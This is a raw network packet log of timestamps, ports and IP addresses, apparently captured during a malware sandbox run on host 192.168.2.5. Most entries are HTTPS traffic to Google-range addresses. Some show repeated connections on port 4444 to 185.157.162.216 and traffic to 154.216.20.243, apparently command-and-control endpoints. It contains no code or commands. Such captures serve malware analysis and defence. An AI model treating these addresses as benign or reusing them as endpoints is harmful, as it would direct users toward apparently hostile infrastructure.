Dec 12, 2024 22:40:38.673037052 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.690011978 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.690053940 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.690109968 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:38.690116882 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.690177917 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:38.694197893 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.706669092 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.706753969 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:38.706759930 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.715981007 CET	443	49822	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:38.719258070 CET	49822	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:38.719265938 CET	443	49822	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:38.719594955 CET	443	49822	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:38.719645023 CET	49822	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:38.720216990 CET	443	49822	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:38.720258951 CET	49822	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:38.720660925 CET	49822	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:38.720710039 CET	443	49822	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:38.721126080 CET	49822	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:38.721132994 CET	443	49822	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:38.765682936 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:38.792381048 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.855776072 CET	49822	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:38.864748955 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.864825964 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:38.864835978 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.869657993 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.869712114 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:38.869718075 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.882462978 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.882509947 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:38.882514954 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.896222115 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.896269083 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:38.896275043 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.910130024 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.910183907 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:38.910188913 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.923930883 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.923979998 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:38.923988104 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.937817097 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.937871933 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:38.937877893 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.950620890 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.950669050 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:38.950673103 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.963524103 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.963579893 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:38.963609934 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.990247965 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.990300894 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:38.990308046 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.993340015 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.993396997 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:38.993402958 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.002192974 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.002299070 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:39.002305984 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.015224934 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.015264988 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:39.015270948 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.018836021 CET	443	49820	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:39.018971920 CET	443	49820	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:39.019010067 CET	49820	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:39.058177948 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.058233023 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:39.058238983 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.063793898 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.063843966 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:39.063848972 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.078531981 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.078581095 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:39.078584909 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.095947981 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.095993996 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:39.095998049 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.096033096 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.096074104 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:39.109014034 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.111066103 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.111109972 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:39.111116886 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.115286112 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.115334988 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:39.115340948 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.122144938 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.122188091 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:39.122196913 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.133184910 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.133230925 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:39.133236885 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.145000935 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.145050049 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:39.145056009 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.160375118 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.160432100 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:39.160442114 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.171287060 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.171335936 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:39.171343088 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.178786039 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.178833008 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:39.178838968 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.188155890 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.188209057 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:39.188215017 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.190854073 CET	49820	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:39.190876961 CET	443	49820	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:39.198443890 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.198488951 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:39.198493958 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.209135056 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.209223032 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:39.209230900 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.217189074 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.217289925 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:39.217299938 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.224504948 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.224591970 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:39.224603891 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.232770920 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.232819080 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:39.232830048 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.241328001 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.241372108 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:39.241383076 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.249902964 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.249948978 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:39.249958038 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.258737087 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.258780003 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:39.258790970 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.266680002 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.266737938 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:39.266771078 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.277549028 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.277631044 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:39.387396097 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:39.387437105 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:39.495696068 CET	4444	49718	185.157.162.216	192.168.2.5
Dec 12, 2024 22:40:39.519553900 CET	443	49822	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:39.522555113 CET	443	49822	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:39.522608042 CET	49822	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:39.532911062 CET	49822	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:39.532938957 CET	443	49822	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:39.568017006 CET	49718	4444	192.168.2.5	185.157.162.216
Dec 12, 2024 22:40:39.570374012 CET	49829	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:39.570422888 CET	443	49829	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:39.570492029 CET	49829	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:39.570943117 CET	49829	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:39.570960045 CET	443	49829	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:39.758447886 CET	49830	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:39.758488894 CET	443	49830	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:39.758549929 CET	49830	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:39.758821011 CET	49830	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:39.758831978 CET	443	49830	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:40.106070042 CET	49832	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:40.106121063 CET	443	49832	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:40.106185913 CET	49832	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:40.106395006 CET	49832	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:40.106409073 CET	443	49832	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:40.616594076 CET	49833	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:40.616642952 CET	443	49833	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:40.616731882 CET	49833	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:40.618571997 CET	49833	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:40.618596077 CET	443	49833	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:41.261892080 CET	443	49829	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:41.307166100 CET	49829	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:41.307192087 CET	443	49829	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:41.307737112 CET	443	49829	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:41.357897997 CET	49829	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:41.358045101 CET	443	49829	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:41.359941006 CET	49829	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:41.359965086 CET	49829	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:41.359976053 CET	443	49829	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:41.471851110 CET	443	49830	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:41.476409912 CET	49830	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:41.476432085 CET	443	49830	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:41.476905107 CET	443	49830	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:41.478713989 CET	49830	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:41.478780031 CET	443	49830	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:41.479899883 CET	49830	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:41.527359962 CET	443	49830	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:41.799954891 CET	443	49832	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:41.820061922 CET	49832	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:41.820106030 CET	443	49832	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:41.821332932 CET	443	49832	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:41.821410894 CET	49832	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:41.843498945 CET	49832	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:41.843596935 CET	49832	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:41.843626022 CET	443	49832	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:41.843708038 CET	443	49832	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:41.997874022 CET	443	49829	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:42.000375986 CET	443	49829	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:42.005305052 CET	49829	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:42.024373055 CET	49829	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:42.024399042 CET	443	49829	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:42.055339098 CET	443	49832	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:42.056354046 CET	49832	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:42.160621881 CET	443	49830	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:42.160685062 CET	443	49830	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:42.160725117 CET	443	49830	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:42.160761118 CET	443	49830	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:42.160795927 CET	49830	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:42.160819054 CET	443	49830	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:42.160868883 CET	49830	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:42.167459965 CET	443	49830	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:42.168157101 CET	49830	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:42.338002920 CET	443	49833	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:42.472496986 CET	49833	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:42.524802923 CET	49833	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:42.524827957 CET	443	49833	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:42.525257111 CET	443	49833	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:42.528285027 CET	49833	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:42.528372049 CET	443	49833	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:42.532131910 CET	49833	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:42.554876089 CET	443	49832	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:42.557284117 CET	443	49832	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:42.557393074 CET	49832	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:42.575335026 CET	443	49833	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:42.864612103 CET	49832	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:42.864706039 CET	443	49832	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:42.865605116 CET	49830	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:42.865639925 CET	443	49830	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:43.032844067 CET	443	49833	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:43.032903910 CET	443	49833	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:43.032965899 CET	443	49833	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:43.033010960 CET	49833	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:43.033010960 CET	49833	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:43.114696980 CET	49833	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:43.114723921 CET	443	49833	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:57.424757004 CET	49870	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:57.424845934 CET	443	49870	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:57.424943924 CET	49870	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:57.434083939 CET	49870	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:57.434109926 CET	443	49870	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:59.129034996 CET	443	49870	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:59.129340887 CET	49870	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:59.129409075 CET	443	49870	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:59.130348921 CET	443	49870	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:59.130415916 CET	49870	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:59.131536007 CET	49870	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:59.131612062 CET	443	49870	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:59.131736994 CET	49870	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:59.131762028 CET	443	49870	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:59.254381895 CET	49870	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:59.819823980 CET	443	49870	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:59.819904089 CET	443	49870	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:59.819958925 CET	49870	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:59.819984913 CET	443	49870	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:59.820000887 CET	443	49870	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:59.820058107 CET	49870	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:41:00.229661942 CET	49870	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:41:00.229684114 CET	443	49870	142.250.181.132	192.168.2.5
Dec 12, 2024 22:41:01.451498032 CET	4444	49718	185.157.162.216	192.168.2.5
Dec 12, 2024 22:41:01.567255974 CET	49718	4444	192.168.2.5	185.157.162.216
Dec 12, 2024 22:41:04.914794922 CET	49893	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:41:04.914860010 CET	443	49893	142.250.181.132	192.168.2.5
Dec 12, 2024 22:41:04.914916039 CET	49893	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:41:04.915566921 CET	49893	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:41:04.915581942 CET	443	49893	142.250.181.132	192.168.2.5
Dec 12, 2024 22:41:06.735249996 CET	443	49893	142.250.181.132	192.168.2.5
Dec 12, 2024 22:41:06.735496044 CET	49893	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:41:06.735518932 CET	443	49893	142.250.181.132	192.168.2.5
Dec 12, 2024 22:41:06.736558914 CET	443	49893	142.250.181.132	192.168.2.5
Dec 12, 2024 22:41:06.736639023 CET	49893	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:41:06.736990929 CET	49893	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:41:06.737052917 CET	443	49893	142.250.181.132	192.168.2.5
Dec 12, 2024 22:41:06.737445116 CET	49893	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:41:06.737456083 CET	443	49893	142.250.181.132	192.168.2.5
Dec 12, 2024 22:41:06.880124092 CET	49893	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:41:07.422703028 CET	443	49893	142.250.181.132	192.168.2.5
Dec 12, 2024 22:41:07.422761917 CET	443	49893	142.250.181.132	192.168.2.5
Dec 12, 2024 22:41:07.422791958 CET	443	49893	142.250.181.132	192.168.2.5
Dec 12, 2024 22:41:07.422818899 CET	443	49893	142.250.181.132	192.168.2.5
Dec 12, 2024 22:41:07.422875881 CET	49893	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:41:07.422918081 CET	443	49893	142.250.181.132	192.168.2.5
Dec 12, 2024 22:41:07.422972918 CET	49893	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:41:07.429841995 CET	443	49893	142.250.181.132	192.168.2.5
Dec 12, 2024 22:41:07.429933071 CET	49893	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:41:08.200025082 CET	49893	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:41:08.200109005 CET	443	49893	142.250.181.132	192.168.2.5
Dec 12, 2024 22:41:09.753160000 CET	49905	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:41:09.753201962 CET	443	49905	172.217.19.238	192.168.2.5
Dec 12, 2024 22:41:09.753400087 CET	49905	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:41:09.753576994 CET	49905	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:41:09.753587008 CET	443	49905	172.217.19.238	192.168.2.5
Dec 12, 2024 22:41:11.446548939 CET	443	49905	172.217.19.238	192.168.2.5
Dec 12, 2024 22:41:11.576462984 CET	49905	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:41:11.635217905 CET	49905	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:41:11.635236025 CET	443	49905	172.217.19.238	192.168.2.5
Dec 12, 2024 22:41:11.635813951 CET	443	49905	172.217.19.238	192.168.2.5
Dec 12, 2024 22:41:11.635827065 CET	443	49905	172.217.19.238	192.168.2.5
Dec 12, 2024 22:41:11.635895967 CET	49905	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:41:11.636523962 CET	443	49905	172.217.19.238	192.168.2.5
Dec 12, 2024 22:41:11.636575937 CET	49905	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:41:11.823498964 CET	49905	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:41:11.823662996 CET	443	49905	172.217.19.238	192.168.2.5
Dec 12, 2024 22:41:11.826643944 CET	49905	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:41:11.826657057 CET	443	49905	172.217.19.238	192.168.2.5
Dec 12, 2024 22:41:11.827409029 CET	49905	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:41:11.875334024 CET	443	49905	172.217.19.238	192.168.2.5
Dec 12, 2024 22:41:12.698713064 CET	443	49905	172.217.19.238	192.168.2.5
Dec 12, 2024 22:41:12.701495886 CET	443	49905	172.217.19.238	192.168.2.5
Dec 12, 2024 22:41:12.701574087 CET	49905	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:41:12.890568972 CET	49905	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:41:12.890593052 CET	443	49905	172.217.19.238	192.168.2.5
Dec 12, 2024 22:41:13.719268084 CET	49914	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:41:13.719337940 CET	443	49914	154.216.20.243	192.168.2.5
Dec 12, 2024 22:41:13.719399929 CET	49914	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:41:13.731792927 CET	49914	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:41:13.731807947 CET	443	49914	154.216.20.243	192.168.2.5
Dec 12, 2024 22:41:15.157360077 CET	443	49914	154.216.20.243	192.168.2.5
Dec 12, 2024 22:41:15.158598900 CET	49914	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:41:15.158636093 CET	443	49914	154.216.20.243	192.168.2.5
Dec 12, 2024 22:41:15.159718037 CET	443	49914	154.216.20.243	192.168.2.5
Dec 12, 2024 22:41:15.159796953 CET	49914	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:41:15.162178040 CET	49914	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:41:15.162256956 CET	443	49914	154.216.20.243	192.168.2.5
Dec 12, 2024 22:41:15.162312984 CET	49914	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:41:15.162326097 CET	443	49914	154.216.20.243	192.168.2.5
Dec 12, 2024 22:41:15.162391901 CET	49914	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:41:15.203375101 CET	443	49914	154.216.20.243	192.168.2.5
Dec 12, 2024 22:41:15.603282928 CET	4444	49718	185.157.162.216	192.168.2.5
Dec 12, 2024 22:41:15.676383972 CET	49718	4444	192.168.2.5	185.157.162.216
Dec 12, 2024 22:41:15.706418991 CET	443	49914	154.216.20.243	192.168.2.5
Dec 12, 2024 22:41:15.706633091 CET	443	49914	154.216.20.243	192.168.2.5
Dec 12, 2024 22:41:15.706708908 CET	49914	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:41:15.723146915 CET	49914	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:41:15.723200083 CET	443	49914	154.216.20.243	192.168.2.5
Dec 12, 2024 22:41:15.723237991 CET	49914	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:41:15.784308910 CET	49718	4444	192.168.2.5	185.157.162.216
Dec 12, 2024 22:41:15.784344912 CET	49718	4444	192.168.2.5	185.157.162.216
Dec 12, 2024 22:41:15.904594898 CET	4444	49718	185.157.162.216	192.168.2.5
Dec 12, 2024 22:41:15.904675007 CET	49718	4444	192.168.2.5	185.157.162.216
Dec 12, 2024 22:41:16.537662983 CET	49922	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:41:16.537709951 CET	443	49922	142.250.181.132	192.168.2.5
Dec 12, 2024 22:41:16.537772894 CET	49922	443	192.168.2.5	142.250.181.132
